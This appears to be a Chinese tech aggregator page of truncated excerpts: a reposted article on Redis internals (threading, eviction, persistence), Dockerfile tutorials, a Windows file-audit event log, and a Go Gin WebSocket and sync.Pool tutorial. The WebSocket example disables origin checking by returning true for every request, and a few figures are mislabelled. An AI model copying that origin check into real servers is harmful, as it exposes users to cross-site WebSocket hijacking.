... script already executed write commands against the dataset. You can either wait the scripttermination or kill the server in a hard way using the SHUTDOWN NOSAVE command. 遇到这种情况,只能通过 shutdown nosave 命令来强行终止 redis。 shutdown nosave 和 shutdown 的区别在于 shutdown nosave 不会进行持久化操作,意味着发生在上一次快照后的数据库修改都会丢失。 4、Redis 为什么这么快? 4.1 Redis到底有多快? 根据官方的数据,Redis 的 QPS 可以达到 10 万左右(每秒请求数)。 4.2 Redis为什么这么快? 总结:1)纯内存结构、2)单线程、3)多路复用 4.2.1 内存 KV 结构的内存数据库,时间复杂度 O(1)。 第二个,要实现这么高的并发性能,是不是要创建非常多的线程? 恰恰相反,Redis 是单线程的。 4.2.2 单线程 单线程有什么好处呢? 1、没有创建线程、销毁线程带来的消耗 2、避免了上线文切换导致的 CPU 消耗 3、避免了线程之间带来的竞争问题,例如加锁释放锁死锁等等 4.2.3 异步非阻塞 异步非阻塞 I/O,多路复用处理并发连接。 4.3 Redis为什么是单线程的? 不是白白浪费了 CPU 的资源吗? 因为单线程已经够用了,CPU 不是 redis 的瓶颈。Redis 的瓶颈最有可能是机器内存或者网络带宽。既然单线程容易实现,而且 CPU 不会成为瓶颈,那就顺理成章地采用单线程的方案了。 4.4 单线程为什么这么快? 因为 Redis 是基于内存的操作,我们先从内存开始说起。 4.4.1 虚拟存储器(虚拟内存 Vitual Memory) 名词解释:主存:内存;辅存:磁盘(硬盘) 计算机主存(内存)可看作一个由 M 个连续的字节大小的单元组成的数组,每个字节有一个唯一的地址,这个地址叫做物理地址(PA)。早期的计算机中,如果 CPU 需要内存,使用物理寻址,直接访问主存储器。 这种方式有几个弊端: 1、在多用户多任务操作系统中,所有的进程共享主存,如果每个进程都独占一块物理地址空间,主存很快就会被用完。我们希望在不同的时刻,不同的进程可以共用同一块物理地址空间。 2、如果所有进程都是直接访问物理内存,那么一个进程就可以修改其他进程的内存数据,导致物理地址空间被破坏,程序运行就会出现异常。 为了解决这些问题,我们就想了一个办法,在 CPU 和主存之间增加一个中间层。CPU 不再使用物理地址访问,而是访问一个虚拟地址,由这个中间层把地址转换成物理地址,最终获得数据。这个中间层就叫做虚拟存储器(Virtual Memory)。 具体的操作如下所示: 在每一个进程开始创建的时候,都会分配一段虚拟地址,然后通过虚拟地址和物理地址的映射来获取真实数据,这样进程就不会直接接触到物理地址,甚至不知道自己调用的哪块物理地址的数据。 目前,大多数操作系统都使用了虚拟内存,如 Windows 系统的虚拟内存、Linux 系统的交换空间等等。Windows 的虚拟内存(pagefile.sys)是磁盘空间的一部分。 在 32 位的系统上,虚拟地址空间大小是 2^32bit=4G。在 64 位系统上,最大虚拟地址空间大小是多少? 是不是 2^64bit=10241014TB=1024PB=16EB?实际上没有用到 64 位,因为用不到这么大的空间,而且会造成很大的系统开销。Linux 一般用低 48 位来表示虚拟地址空间,也就是 2^48bit=256T。 cat /proc/cpuinfo address sizes : 40 bits physical, 48 bits virtual 实际的物理内存可能远远小于虚拟内存的大小。 总结:引入虚拟内存,可以提供更大的地址空间,并且地址空间是连续的,使得程序编写、链接更加简单。并且可以对物理内存进行隔离,不同的进程操作互不影响。还可以通过把同一块物理内存映射到不同的虚拟地址空间实现内存共享。 4.4.2 用户空间和内核空间 为了避免用户进程直接操作内核,保证内核安全,操作系统将虚拟内存划分为两部分,一部分是内核空间(Kernel-space)/ˈkɜːnl /,一部分是用户空间(User-space)。 内核是操作系统的核心,独立于普通的应用程序,可以访问受保护的内存空间,也有访问底层硬件设备的权限。 内核空间中存放的是内核代码和数据,而进程的用户空间中存放的是用户程序的代码和数据。不管是内核空间还是用户空间,它们都处于虚拟空间中,都是对物理地址的映射。 在 Linux 系统中, 内核进程和用户进程所占的虚拟内存比例是 1:3。 当进程运行在内核空间时就处于内核态,而进程运行在用户空间时则处于用户态。 进程在内核空间以执行任意命令,调用系统的一切资源;在用户空间只能执行简单的运算,不能直接调用系统资源,必须通过系统接口(又称 system call),才能向内核发出指令。 top 命令: us 代表 CPU 消耗在 User space 的时间百分比; sy 代表 CPU 消耗在 Kernel space 的时间百分比。 4.4.3 进程切换(上下文切换) 多任务操作系统是怎么实现运行远大于 CPU 数量的任务个数的? 当然,这些任务实际上并不是真的在同时运行,而是因为系统通过时间片分片算法,在很短的时间内,将 CPU 轮流分配给它们,造成多任务同时运行的错觉。 为了控制进程的执行,内核必须有能力挂起正在 CPU 上运行的进程,并恢复以前挂起的某个进程的执行。这种行为被称为进程切换。 什么叫上下文? 在每个任务运行前,CPU 都需要知道任务从哪里加载、又从哪里开始运行,也就是说,需要系统事先帮它设置好 CPU 寄存器和程序计数器(ProgramCounter),这个叫做 CPU 的上下文。 而这些保存下来的上下文,会存储在系统内核中,并在任务重新调度执行时再次加载进来。这样就能保证任务原来的状态不受影响,让任务看起来还是连续运行。 在切换上下文的时候,需要完成一系列的工作,这是一个很消耗资源的操作。 4.4.4 进程的阻塞 正在运行的进程由于提出系统服务请求(如 I/O 操作),但因为某种原因未得到操作系统的立即响应,该进程只能把自己变成阻塞状态,等待相应的事件出现后才被唤醒。 进程在阻塞状态不占用 CPU 资源。 4.4.5 文件描述符 FD Linux 系统将所有设备都当作文件来处理,而 Linux 用文件描述符来标识每个文件对象。 文件描述符(File Descriptor)是内核为了高效管理已被打开的文件所创建的索引,用于指向被打开的文件,所有执行 I/O 操作的系统调用都通过文件描述符;文件描述符是一个简单的非负整数,用以表明每个被进程打开的文件。 Linux 系统里面有三个标准文件描述符。 0:标准输入(键盘); 1:标准输出(显示器); 2:标准错误输出(显示器)。 4.4.6 传统 I/O 数据拷贝 以读操作为例: 当应用程序执行 read 系统调用读取文件描述符(FD)的时候,如果这块数据已经存在于用户进程的页内存中,就直接从内存中读取数据。如果数据不存在,则先将数据从磁盘加载数据到内核缓冲区中,再从内核缓冲区拷贝到用户进程的页内存中。(两次拷贝,两次 user 和 kernel 的上下文切换)。 I/O 的阻塞到底阻塞在哪里? 4.4.7 Blocking I/O 当使用 read 或 write 对某个文件描述符进行过读写时,如果当前 FD 不可读,系统就不会对其他的操作做出响应。从设备复制数据到内核缓冲区是阻塞的,从内核缓冲区拷贝到用户空间,也是阻塞的,直到 copy complete,内核返回结果,用户进程才解除 block 的状态。 为了解决阻塞的问题,我们有几个思路。 1、在服务端创建多个线程或者使用线程池,但是在高并发的情况下需要的线程会很多,系统无法承受,而且创建和释放线程都需要消耗资源。 2、由请求方定期轮询,在数据准备完毕后再从内核缓存缓冲区复制数据到用户空间 (非阻塞式 I/O),这种方式会存在一定的延迟。 能不能用一个线程处理多个客户端请求? 
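上一节末尾的问题“能不能用一个线程处理多个客户端请求”,正是下一节 I/O 多路复用要回答的。先看一个单线程多路复用的 Python 小示意(标准库 selectors,Linux 上底层就是 epoll),只为演示“一个线程同时等待多个文件描述符”的机制,并非 Redis 源码:

# 极简示意:单线程 + I/O 多路复用的 echo 服务器
# selectors 在 Linux 下底层使用 epoll
import selectors
import socket

sel = selectors.DefaultSelector()

def accept(server):
    conn, _ = server.accept()
    conn.setblocking(False)
    sel.register(conn, selectors.EVENT_READ, handle)  # 监视新连接

def handle(conn):
    data = conn.recv(1024)
    if data:
        conn.sendall(data)    # 原样回写
    else:
        sel.unregister(conn)  # 对端关闭
        conn.close()

server = socket.socket()
server.bind(("127.0.0.1", 6380))
server.listen()
server.setblocking(False)
sel.register(server, selectors.EVENT_READ, accept)

while True:                      # 单线程事件循环
    for key, _ in sel.select():  # 阻塞等待任一 fd 就绪
        key.data(key.fileobj)    # 调用注册时附带的回调

Redis 的事件循环本质上就是这个模式,只是按平台在 epoll/kqueue/evport/select 几种实现中选择。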
4.4.8 I/O 多路复用(I/O Multiplexing) I/O 指的是网络 I/O。 多路指的是多个 TCP 连接(Socket 或 Channel)。 复用指的是复用一个或多个线程。它的基本原理就是不再由应用程序自己监视连接,而是由内核替应用程序监视文件描述符。 客户端在操作的时候,会产生具有不同事件类型的 socket。在服务端,I/O 多路复用程序(I/O Multiplexing Module)会把消息放入队列中,然后通过文件事件分派器(File event Dispatcher),转发到不同的事件处理器中。 多路复用有很多的实现,以 select 为例,当用户进程调用了多路复用器,进程会被阻塞。内核会监视多路复用器负责的所有 socket,当任何一个 socket 的数据准备好了,多路复用器就会返回。这时候用户进程再调用 read 操作,把数据从内核缓冲区拷贝到用户空间。 所以,I/O 多路复用的特点是通过一种机制一个进程能同时等待多个文件描述符,而这些文件描述符(套接字描述符)其中的任意一个进入读就绪(readable)状态,select() 函数就可以返回。 Redis 的多路复用, 提供了 select, epoll, evport, kqueue 几种选择,在编译的时 候来选择一种。 evport 是 Solaris 系统内核提供支持的; epoll 是 LINUX 系统内核提供支持的; kqueue 是 Mac 系统提供支持的; select 是 POSIX 提供的,一般的操作系统都有支撑(保底方案); 源码 ae_epoll.c、ae_select.c、ae_kqueue.c、ae_evport.c 5、内存回收 Reids 所有的数据都是存储在内存中的,在某些情况下需要对占用的内存空间进行回 收。内存回收主要分为两类,一类是 key 过期,一类是内存使用达到上限(max_memory) 触发内存淘汰。 5.1 过期策略 要实现 key 过期,我们有几种思路。 5.1.1 定时过期(主动淘汰) 每个设置过期时间的 key 都需要创建一个定时器,到过期时间就会立即清除。该策略可以立即清除过期的数据,对内存很友好;但是会占用大量的 CPU 资源去处理过期的 数据,从而影响缓存的响应时间和吞吐量。 5.1.2 惰性过期(被动淘汰) 只有当访问一个 key 时,才会判断该 key 是否已过期,过期则清除。该策略可以最大化地节省 CPU 资源,却对内存非常不友好。极端情况可能出现大量的过期 key 没有再次被访问,从而不会被清除,占用大量内存。 例如 String,在 getCommand 里面会调用 expireIfNeeded server.c expireIfNeeded(redisDb db, robj key) 第二种情况,每次写入 key 时,发现内存不够,调用 activeExpireCycle 释放一部分内存。 expire.c activeExpireCycle(int type) 5.1.3 定期过期 源码:server.h typedef struct redisDb { dict dict; / 所有的键值对 /dict expires; / 设置了过期时间的键值对 /dict blocking_keys; dict ready_keys; dict watched_keys; int id;long long avg_ttl;list defrag_later; } redisDb; 每隔一定的时间,会扫描一定数量的数据库的 expires 字典中一定数量的 key,并清除其中已过期的 key。该策略是前两者的一个折中方案。通过调整定时扫描的时间间隔和每次扫描的限定耗时,可以在不同情况下使得 CPU 和内存资源达到最优的平衡效果。 Redis 中同时使用了惰性过期和定期过期两种过期策略。 5.2 淘汰策略 Redis 的内存淘汰策略,是指当内存使用达到最大内存极限时,需要使用淘汰算法来决定清理掉哪些数据,以保证新数据的存入。 5.2.1 最大内存设置 redis.conf 参数配置: maxmemory <bytes> 如果不设置 maxmemory 或者设置为 0,64 位系统不限制内存,32 位系统最多使用 3GB 内存。 动态修改: redis> config set maxmemory 2GB 到达最大内存以后怎么办? 5.2.2 淘汰策略 https://redis.io/topics/lru-cache redis.conf maxmemory-policy noeviction 先从算法来看: LRU,Least Recently Used:最近最少使用。判断最近被使用的时间,目前最远的数据优先被淘汰。 LFU,Least Frequently Used,最不常用,4.0 版本新增。 random,随机删除。 如果没有符合前提条件的 key 被淘汰,那么 volatile-lru、volatile-random、 volatile-ttl 相当于 noeviction(不做内存回收)。 动态修改淘汰策略: redis> config set maxmemory-policy volatile-lru 建议使用 volatile-lru,在保证正常服务的情况下,优先删除最近最少使用的 key。 5.2.3 LRU 淘汰原理 问题:如果基于传统 LRU 算法实现 Redis LRU 会有什么问题? 需要额外的数据结构存储,消耗内存。 Redis LRU 对传统的 LRU 算法进行了改良,通过随机采样来调整算法的精度。如果淘汰策略是 LRU,则根据配置的采样值 maxmemory_samples(默认是 5 个), 随机从数据库中选择 m 个 key, 淘汰其中热度最低的 key 对应的缓存数据。所以采样参数m配置的数值越大, 就越能精确的查找到待淘汰的缓存数据,但是也消耗更多的CPU计算,执行效率降低。 问题:如何找出热度最低的数据? Redis 中所有对象结构都有一个 lru 字段, 且使用了 unsigned 的低 24 位,这个字段用来记录对象的热度。对象被创建时会记录 lru 值。在被访问的时候也会更新 lru 的值。 但是不是获取系统当前的时间戳,而是设置为全局变量 server.lruclock 的值。 源码:server.h typedef struct redisObject {unsigned type:4;unsigned encoding:4;unsigned lru:LRU_BITS;int refcount;void ptr; } robj; server.lruclock 的值怎么来的? Redis 中有个定时处理的函数 serverCron,默认每 100 毫秒调用函数 updateCachedTime 更新一次全局变量的 server.lruclock 的值,它记录的是当前 unix 时间戳。 源码:server.c void updateCachedTime(void) { time_t unixtime = time(NULL); atomicSet(server.unixtime,unixtime); server.mstime = mstime();struct tm tm; localtime_r(&server.unixtime,&tm);server.daylight_active = tm.tm_isdst; } 问题:为什么不获取精确的时间而是放在全局变量中?不会有延迟的问题吗? 这样函数 lookupKey 中更新数据的 lru 热度值时,就不用每次调用系统函数 time,可以提高执行效率。 OK,当对象里面已经有了 LRU 字段的值,就可以评估对象的热度了。 函数 estimateObjectIdleTime 评估指定对象的 lru 热度,思想就是对象的 lru 值和全局的 server.lruclock 的差值越大(越久没有得到更新),该对象热度越低。 源码 evict.c / Given an object returns the min number of milliseconds the object was never requested, using an approximated LRU algorithm. 
/unsigned long long estimateObjectIdleTime(robj o) {unsigned long long lruclock = LRU_CLOCK(); if (lruclock >= o->lru) {return (lruclock - o->lru) LRU_CLOCK_RESOLUTION; } else {return (lruclock + (LRU_CLOCK_MAX - o->lru)) LRU_CLOCK_RESOLUTION;} } server.lruclock 只有 24 位,按秒为单位来表示才能存储 194 天。当超过 24bit 能表 示的最大时间的时候,它会从头开始计算。 server.h define LRU_CLOCK_MAX ((1<<LRU_BITS)-1) / Max value of obj->lru / 在这种情况下,可能会出现对象的 lru 大于 server.lruclock 的情况,如果这种情况 出现那么就两个相加而不是相减来求最久的 key。 为什么不用常规的哈希表+双向链表的方式实现?需要额外的数据结构,消耗资源。而 Redis LRU 算法在 sample 为 10 的情况下,已经能接近传统 LRU 算法了。 问题:除了消耗资源之外,传统 LRU 还有什么问题? 如图,假设 A 在 10 秒内被访问了 5 次,而 B 在 10 秒内被访问了 3 次。因为 B 最后一次被访问的时间比 A 要晚,在同等的情况下,A 反而先被回收。 问题:要实现基于访问频率的淘汰机制,怎么做? 5.2.4 LFU server.h typedef struct redisObject {unsigned type:4;unsigned encoding:4;unsigned lru:LRU_BITS;int refcount;void ptr; } robj; 当这 24 bits 用作 LFU 时,其被分为两部分: 高 16 位用来记录访问时间(单位为分钟,ldt,last decrement time) 低 8 位用来记录访问频率,简称 counter(logc,logistic counter) counter 是用基于概率的对数计数器实现的,8 位可以表示百万次的访问频率。 对象被读写的时候,lfu 的值会被更新。 db.c——lookupKey void updateLFU(robj val) {unsigned long counter = LFUDecrAndReturn(val); counter = LFULogIncr(counter);val->lru = (LFUGetTimeInMinutes()<<8) | counter;} 增长的速率由,lfu-log-factor 越大,counter 增长的越慢 redis.conf 配置文件。 lfu-log-factor 10 如果计数器只会递增不会递减,也不能体现对象的热度。没有被访问的时候,计数器怎么递减呢? 减少的值由衰减因子 lfu-decay-time(分钟)来控制,如果值是 1 的话,N 分钟没有访问就要减少 N。 redis.conf 配置文件 lfu-decay-time 1 6、持久化机制 https://redis.io/topics/persistence Redis 速度快,很大一部分原因是因为它所有的数据都存储在内存中。如果断电或者宕机,都会导致内存中的数据丢失。为了实现重启后数据不丢失,Redis 提供了两种持久化的方案,一种是 RDB 快照(Redis DataBase),一种是 AOF(Append Only File)。 6.1 RDB RDB 是 Redis 默认的持久化方案。当满足一定条件的时候,会把当前内存中的数据写入磁盘,生成一个快照文件 dump.rdb。Redis 重启会通过加载 dump.rdb 文件恢复数据。 什么时候写入 rdb 文件? 6.1.1 RDB 触发 1、自动触发 a)配置规则触发。 redis.conf, SNAPSHOTTING,其中定义了触发把数据保存到磁盘的触发频率。 如果不需要 RDB 方案,注释 save 或者配置成空字符串""。 save 900 1 900 秒内至少有一个 key 被修改(包括添加) save 300 10 400 秒内至少有 10 个 key 被修改save 60 10000 60 秒内至少有 10000 个 key 被修改 注意上面的配置是不冲突的,只要满足任意一个都会触发。 RDB 文件位置和目录: 文件路径,dir ./ 文件名称dbfilename dump.rdb 是否是LZF压缩rdb文件 rdbcompression yes 开启数据校验 rdbchecksum yes 问题:为什么停止 Redis 服务的时候没有 save,重启数据还在? 
RDB 还有两种触发方式: b)shutdown 触发,保证服务器正常关闭。 c)flushall,RDB 文件是空的,没什么意义(删掉 dump.rdb 演示一下)。 2、手动触发 如果我们需要重启服务或者迁移数据,这个时候就需要手动触 RDB 快照保存。Redis 提供了两条命令: a)save save 在生成快照的时候会阻塞当前 Redis 服务器, Redis 不能处理其他命令。如果内存中的数据比较多,会造成 Redis 长时间的阻塞。生产环境不建议使用这个命令。 为了解决这个问题,Redis 提供了第二种方式。 执行 bgsave 时,Redis 会在后台异步进行快照操作,快照同时还可以响应客户端请求。 具体操作是 Redis 进程执行 fork 操作创建子进程(copy-on-write),RDB 持久化过程由子进程负责,完成后自动结束。它不会记录 fork 之后后续的命令。阻塞只发生在 fork 阶段,一般时间很短。 用 lastsave 命令可以查看最近一次成功生成快照的时间。 6.1.2 RDB 数据的恢复(演示) 1、shutdown 持久化添加键值 添加键值 redis> set k1 1 redis> set k2 2 redis> set k3 3 redis> set k4 4 redis> set k5 5 停服务器,触发 save redis> shutdown 备份 dump.rdb 文件 cp dump.rdb dump.rdb.bak 启动服务器 /usr/local/soft/redis-5.0.5/src/redis-server /usr/local/soft/redis-5.0.5/redis.conf 啥都没有: redis> keys 3、通过备份文件恢复数据停服务器 redis> shutdown 重命名备份文件 mv dump.rdb.bak dump.rdb 启动服务器 /usr/local/soft/redis-5.0.5/src/redis-server /usr/local/soft/redis-5.0.5/redis.conf 查看数据 redis> keys 6.1.3 RDB 文件的优势和劣势 一、优势 1.RDB 是一个非常紧凑(compact)的文件,它保存了 redis 在某个时间点上的数据集。这种文件非常适合用于进行备份和灾难恢复。 2.生成 RDB 文件的时候,redis 主进程会 fork()一个子进程来处理所有保存工作,主进程不需要进行任何磁盘 IO 操作。 3.RDB 在恢复大数据集时的速度比 AOF 的恢复速度要快。 二、劣势 1、RDB 方式数据没办法做到实时持久化/秒级持久化。因为 bgsave 每次运行都要执行 fork 操作创建子进程,频繁执行成本过高。 2、在一定间隔时间做一次备份,所以如果 redis 意外 down 掉的话,就会丢失最后一次快照之后的所有修改(数据有丢失)。 如果数据相对来说比较重要,希望将损失降到最小,则可以使用 AOF 方式进行持久化。 6.2 AOF Append Only File AOF:Redis 默认不开启。AOF 采用日志的形式来记录每个写操作,并追加到文件中。开启后,执行更改 Redis 数据的命令时,就会把命令写入到 AOF 文件中。 Redis 重启时会根据日志文件的内容把写指令从前到后执行一次以完成数据的恢复工作。 6.2.1 AOF 配置 配置文件 redis.conf 开关appendonly no 文件名appendfilename "appendonly.aof" AOF 文件的内容(vim 查看): 问题:数据都是实时持久化到磁盘吗? 由于操作系统的缓存机制,AOF 数据并没有真正地写入硬盘,而是进入了系统的硬盘缓存。什么时候把缓冲区的内容写入到 AOF 文件? 问题:文件越来越大,怎么办? 由于 AOF 持久化是 Redis 不断将写命令记录到 AOF 文件中,随着 Redis 不断的进行,AOF 的文件会越来越大,文件越大,占用服务器内存越大以及 AOF 恢复要求时间越长。 例如 set xxx 666,执行 1000 次,结果都是 xxx=666。 为了解决这个问题,Redis 新增了重写机制,当 AOF 文件的大小超过所设定的阈值时,Redis 就会启动 AOF 文件的内容压缩,只保留可以恢复数据的最小指令集。 可以使用命令 bgrewriteaof 来重写。 AOF 文件重写并不是对原文件进行重新整理,而是直接读取服务器现有的键值对,然后用一条命令去代替之前记录这个键值对的多条命令,生成一个新的文件后去替换原来的 AOF 文件。 重写触发机制 auto-aof-rewrite-percentage 100 auto-aof-rewrite-min-size 64mb 问题:重写过程中,AOF 文件被更改了怎么办? 另外有两个与 AOF 相关的参数: 6.2.2 AOF 数据恢复 重启 Redis 之后就会进行 AOF 文件的恢复。 6.2.3 AOF 优势与劣势 优点: 1、AOF 持久化的方法提供了多种的同步频率,即使使用默认的同步频率每秒同步一次,Redis 最多也就丢失 1 秒的数据而已。 缺点: 1、对于具有相同数据的的 Redis,AOF 文件通常会比 RDB 文件体积更大(RDB 存的是数据快照)。 2、虽然 AOF 提供了多种同步的频率,默认情况下,每秒同步一次的频率也具有较高的性能。在高并发的情况下,RDB 比 AOF 具好更好的性能保证。 6.3 两种方案比较 那么对于 AOF 和 RDB 两种持久化方式,我们应该如何选择呢? 如果可以忍受一小段时间内数据的丢失,毫无疑问使用 RDB 是最好的,定时生成 RDB 快照(snapshot)非常便于进行数据库备份, 并且 RDB 恢复数据集的速度也要比 AOF 恢复的速度要快。 否则就使用 AOF 重写。但是一般情况下建议不要单独使用某一种持久化机制,而是应该两种一起用,在这种情况下,当 redis 重启的时候会优先载入 AOF 文件来恢复原始的数据,因为在通常情况下 AOF 文件保存的数据集要比 RDB 文件保存的数据集要完整。 本篇文章为转载内容。原文链接:https://blog.csdn.net/zhoutaochun/article/details/120075092。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
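上文 5.2.3 节讲到 Redis 的近似 LRU:不维护全局链表,而是随机采样 maxmemory_samples 个 key,淘汰其中热度最低的。下面用 Python 给出一个原理示意(仅为演示采样淘汰的思想,并非 Redis 源码;用时间戳近似对象的 lru 字段):

# 极简示意:Redis 风格的近似 LRU 淘汰
# 随机采样 m 个 key,淘汰其中最久未访问的一个
import random
import time

data = {}         # key -> value
last_access = {}  # key -> 最近访问时间,近似对象的 lru 字段

def touch(key, value=None):
    if value is not None:
        data[key] = value
    last_access[key] = time.monotonic()  # 读写时更新热度
    return data.get(key)

def evict_one(samples=5):
    # samples 对应 maxmemory_samples:越大越精确,也越耗 CPU
    candidates = random.sample(list(data), min(samples, len(data)))
    victim = min(candidates, key=lambda k: last_access[k])
    del data[victim]
    del last_access[victim]
    return victim

for i in range(100):
    touch("k%d" % i, i)
touch("k0")                    # k0 刚被访问,热度最高
print(evict_one(samples=10))   # 大概率淘汰一个较久未被访问的 key

采样数越大,结果越接近严格 LRU,这正是原文“sample 为 10 的情况下已接近传统 LRU”的含义。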
2024-03-18 12:25:04
541
转载
Docker
...N apt-get update && apt-get install -y python3 COPY . /应用 WORKDIR /应用 CMD ["python3", "app.py"] 可以看到,这个Dockerfile首先以ubuntu:latest镜像为基础,然后安装了Python 3,接着把当前目录下的所有文件复制到/应用目录,并把/应用目录设置为工作目录。最后,运行了一个Python 3应用程序。这个Dockerfile是一个简单的范例,你可以根据自己的需求进行修改。 除了Dockerfile之外,Docker文件夹中还包含了其他必要的文件,比如.dockerignore文件,用来指定哪些文件不需要被复制进Docker镜像中;以及docker-compose.yml文件,用来定义多个Docker容器之间的关系。 总的来说,Docker文件夹是Docker应用程序的重要组成部分,它能够帮助我们快速构建、运行和部署Docker容器。
2024-04-07 16:13:15
555
电脑达人
Docker
...N apt-get update RUN apt-get install -y python3 RUN apt-get install -y python3-pip WORKDIR /app COPY requirements.txt /app RUN pip3 install -r requirements.txt COPY . /app CMD ["python3", "app.py"] 这个Dockerfile的作用是:使用最新版本的Ubuntu作为基础镜像,然后安装Python3和pip包管理器。我们的程序源码位于/app目录下,所以将工作目录设置为/app。接下来,应用程序的依赖项列表保存在requirements.txt文件中,先安装这些依赖项;最后,把整个程序源码复制到/app目录下,并指定应用程序的启动命令。 当我们构建这个Docker镜像时,会依次执行上述Dockerfile中的指令,生成包含应用程序及其依赖项的镜像。使用以下命令来构建镜像: docker build -t myapp . 其中,“myapp”是我们为此镜像指定的名称,点号表示使用当前目录中的Dockerfile文件。 现在,我们可以在Docker容器中运行应用程序了。使用以下命令来启动容器: docker run -d -p 5000:5000 myapp 其中,“-d”选项表示在后台运行容器,“-p”选项把容器的5000端口映射到主机的5000端口。这意味着我们可以在本地浏览器中打开http://localhost:5000来访问应用程序。 这就是使用Docker容器化应用程序的基本过程,它可以简化应用程序的构建和部署,提高开发效率。
2023-05-14 18:00:01
553
软件工程师
Docker
...N apt-get update && apt-get install -y curl 在镜像内安装curl命令 CMD ["curl", "https://www.docker.com"] 设置默认启动时运行的命令 在这个例子中,我们执行了三个基本操作: - FROM 指令指定了基础镜像。 - RUN 指令用于在新创建的镜像中执行命令并提交结果。 - CMD 指令设置了容器启动后的默认执行命令。 3. Dockerfile进阶 深入理解和使用指令 3.1 COPY与ADD指令 当我们需要将宿主机的文件复制到镜像内部时,可以使用COPY或ADD指令: dockerfile COPY . /app 将当前目录下的所有内容复制到镜像的/app目录下 ADD requirements.txt /app/ 添加特定文件到镜像指定位置,并支持自动解压tar归档文件 3.2 ENV指令 设置环境变量对于配置应用程序至关重要,ENV指令允许我们在构建镜像时定义环境变量: dockerfile ENV NODE_ENV=production 3.3 WORKDIR指令 WORKDIR用来指定工作目录,后续的RUN、CMD、ENTRYPOINT等指令都将在这个目录下执行: dockerfile WORKDIR /app 3.4 EXPOSE指令 EXPOSE用于声明容器对外提供服务所监听的端口: dockerfile EXPOSE 80 443 4. 高级话题 Dockerfile最佳实践与思考 - 保持镜像精简:每次修改镜像都应尽量小且独立,遵循单一职责原则,每个镜像只做一件事并做好。 - 层叠优化:合理安排Dockerfile中的指令顺序,减少不必要的层构建,提升构建效率。 - 充分利用缓存:Docker在构建过程中会利用缓存机制,如果已有的层没有变化,则直接复用,因此,把变动可能性大的步骤放在最后能有效利用缓存加速构建。 在编写Dockerfile的过程中,我们常常会遇到各种挑战和问题,这正是探索与学习的乐趣所在。每一次动手尝试,都是我们对容器化这个理念的一次接地气的深入理解和灵活运用,就好比每敲出的一行代码,都在悄无声息地讲述着我们这群人,对于打造出那种既高效、又稳定、还能随时随地搬来搬去的应用环境,那份死磕到底、永不言弃的坚持与热爱。 所以,亲爱的开发者朋友们,不妨亲手拿起键盘,去编写属于你自己的Dockerfile,感受那种“从无到有”的创造魅力,同时也能深深体验到Docker所带来的便捷和力量。在这场编程之旅中,愿我们都能以更轻便的方式,拥抱云原生时代!
2023-08-01 16:49:40
513
百转千回_
转载文章
...sID="4" ThreadID="72" /><Channel>Security</Channel><Computer>IDX-ST-05</Computer><Security /></System><EventData><Data Name="SubjectUserSid">S-1-5-21-1815651738-4066643265-3072818021-1004</Data><Data Name="SubjectUserName">lxy</Data><Data Name="SubjectDomainName">IDX-ST-05</Data><Data Name="SubjectLogonId">0x2ed3b8</Data><Data Name="ObjectServer">Security</Data><Data Name="ObjectType">File</Data><Data Name="ObjectName">C:\Data\net.txt</Data><Data Name="HandleId">0x444</Data><Data Name="AccessList">%%1537</Data><Data Name="AccessMask">0x10000</Data><Data Name="ProcessId">0x4</Data><Data Name="ProcessName"></Data></EventData></Event> 文件操作码表 File ReadAccesses: ReadData (or ListDirectory)AccessMask: 0x1File WriteAccesses: WriteData (or AddFile)AccessMask: 0x2File DeleteAccesses: DELETEAccessMask: 0x10000File RenameAccesses: DELETEAccessMask: 0x10000File CopyAccesses: ReadData (or ListDirectory)AccessMask: 0x1File Permissions ChangeAccesses: WRITE_DACAccessMask: 0x40000File Ownership ChangeAccesses: WRITE_OWNERAccessMask: 0x80000 转载于:https://blog.51cto.com/linxy/2119150 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_34112900/article/details/92532120。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-12 11:51:46
151
转载
Go Gin
...Upgrader{ ReadBufferSize: 1024, WriteBufferSize: 1024, CheckOrigin: func(r *http.Request) bool { return true // 允许跨域 }, } func handleWebSocket(c *gin.Context) { ws, err := upgrader.Upgrade(c.Writer, c.Request, nil) if err != nil { log.Println("Failed to upgrade:", err) return } defer ws.Close() for { messageType, msg, err := ws.ReadMessage() if err != nil { log.Println("Error reading message:", err) break } log.Printf("Received: %s\n", string(msg)) err = ws.WriteMessage(messageType, msg) if err != nil { log.Println("Error writing message:", err) break } } } func main() { r := gin.Default() r.GET("/ws", handleWebSocket) r.Run(":8080") } 在这段代码中,我们利用gorilla/websocket包实现了WebSocket升级,并在handleWebSocket函数中处理了消息的读取与发送。你可以试着在浏览器里输入这个地址:ws://localhost:8080/ws,然后用JavaScript发个消息试试,看能不能马上收到服务器的回应。 深入探讨 说实话,刚开始写这部分代码的时候,我还担心WebSocket的兼容性问题。后来发现,只要正确设置了CheckOrigin方法,大多数现代浏览器都能正常工作。这让我更加坚定了对Gin的信心——它虽然简单,但足够强大! --- 四、进阶技巧 并发与性能优化 在实际项目中,我们可能会遇到高并发的情况。为了保证系统的稳定性,我们需要合理地管理线程池和内存分配。Gin提供了一些工具可以帮助我们做到这一点。 例如,我们可以使用sync.Pool来复用对象,减少垃圾回收的压力。下面是一个示例: go package main import ( "net/http" "sync" "time" "github.com/gin-gonic/gin" ) var pool *sync.Pool func init() { pool = &sync.Pool{ New: func() interface{} { return make([]byte, 1024) }, } } func handler(c *gin.Context) { data := pool.Get().([]byte) defer pool.Put(data) copy(data, []byte("Hello World!")) time.Sleep(100 * time.Millisecond) // 模拟耗时操作 c.String(http.StatusOK, string(data)) } func main() { r := gin.Default() r.GET("/", handler) r.Run(":8080") } 在这个例子中,我们定义了一个sync.Pool来存储临时数据。每次处理请求时,从池中获取缓冲区,处理完毕后再放回池中。这样可以避免频繁的内存分配和释放,从而提升性能。 反思与总结 其实,刚开始学习这段代码的时候,我对sync.Pool的理解还停留在表面。直到后来真正用它解决了性能瓶颈,我才意识到它的价值所在。这也让我明白,优秀的框架只是起点,关键还是要结合实际需求去探索和实践。 --- 五、未来展望 